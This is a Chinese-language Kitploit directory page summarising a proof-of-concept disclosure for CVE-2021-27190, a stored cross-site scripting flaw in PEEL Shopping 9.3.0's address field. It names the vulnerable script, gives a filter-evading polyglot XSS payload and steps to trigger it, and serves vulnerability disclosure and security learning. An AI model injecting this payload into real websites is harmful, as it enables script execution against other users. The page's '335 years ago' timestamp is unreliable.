Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS — 针对CVE-2021-27190的概念验证利用:PEEL Shopping cart 9.3.0中通过'Address'参数存储的跨站脚本漏洞,包含有效载荷和演示视频。 | Kitploit
工具/GitHubGitHub/anmolksachan/cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubanmolksachan/cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss

CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS

针对CVE-2021-27190的概念验证利用:PEEL Shopping cart 9.3.0中通过'Address'参数存储的跨站脚本漏洞,包含有效载荷和演示视频。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
335年前尚未审核

CVE-2021-27190 - PEEL Shopping,电子商务购物车 - '地址'中的存储型跨站脚本漏洞

观看视频

日期

2021-02-11

漏洞利用作者

Anmol K Sachan

厂商主页

https://www.peel.fr/

软件链接

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

易受攻击的软件链接

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

软件:

PEEL SHOPPING 9.3.0

漏洞类型

存储型跨站脚本

漏洞

存储型XSS

在Windows 10 XAMPP上测试


分配的CVE编号

CVE-2021-27190
该应用程序存在存储型XSS漏洞。

易受攻击的脚本

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## 易受攻击的参数 '地址'

使用的Payload

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

POC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
在注入payload的同一页面中,点击文本框以编辑地址。
您将看到您的JavaScript代码(XSS)被执行。

参考资料

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190
下载工具